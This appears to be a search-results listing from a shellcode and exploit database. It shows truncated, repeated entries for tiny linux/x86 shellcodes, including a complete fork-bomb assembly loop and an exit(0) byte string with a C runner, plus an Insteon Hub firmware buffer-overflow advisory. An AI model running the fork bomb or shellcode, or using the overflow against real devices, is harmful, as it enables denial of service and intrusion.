9 matches found
Buffer overflow
An attacker could send an authenticated HTTP request to trigger this vulnerability in Insteon Hub running firmware version 1012. At 0x9d01c318 the value for the sport key is copied using strcpy to the buffer at 0xa00017f4. This buffer is 6 bytes large, sending anything longer will cause a buffer...
linux/x86 - exit(0) - 6 bytes
/ linux/x86 exit0 - 6 bytes Febriyanto Nugroho / include char shellcode = "\xf7\xf0" "\xcd\x80" "\xeb\xfa"; int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...
linux/x86 - exit0 6 bytes
linux/x86 - exit0 6 bytes. Shellcode exploit for linx86 platform / linux/x86 exit0 - 6 bytes Febriyanto Nugroho / include char shellcode = "\xf7\xf0" "\xcd\x80" "\xeb\xfa"; int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...
Linux x86 forkbombe
No description provided by source. / Title: Linux x86 forkbombe - 6 bytes Author: Jonathan Salwan [email protected] Web: http://www.shell-storm.org ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Disassembly of section .text: 08048054 a: 8048054: b0 02 mov $0x2,%al 8048056: c...
linux/x86 forkbombe - 6 bytes
Exploit for linux/x86 platform in category shellcode ============================= linux/x86 forkbombe - 6 bytes ============================= / Title: Linux x86 forkbombe - 6 bytes Author: Jonathan Salwan Web: http://www.shell-storm.org ! Database of shellcodes:...
linux/x86 - DoS-Badger-Game shellcode 6 bytes
Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 - DoS-Badger-Game shellcode 6 bytes ============================================= include include / by Magnefikko 14.04.2010 email protected promhyl.oz.pl Subgroup: PRekambr Name: 6 bytes...
DoS-Badger-Game shellcode 6 bytes
6 bytes DoS-Badger-Game shellcode. Shellcode exploit for linux platform include include / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 6 bytes DoS-Badger-Game shellcode Platform: Linux x86 pause gcc -Wl,-z,execstack filename.c shellcode:...
linux/x86 fork bomb 6 bytes
No description provided by source. Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; root@thegibson ; 2009-12-30 section .text global start start: ; fork mov al, 2 int 0x80 jmp short start...
linux/x86 fork bomb 6 bytes
linux/x86 fork bomb 6 bytes. Shellcode exploit for linx86 platform Smallest fork bomb shellcode I could make. ; linux/x86 fork bomb 6 bytes ; root@thegibson ; 2009-12-30 section .text global start start: ; fork mov al, 2 int 0x80 jmp short start...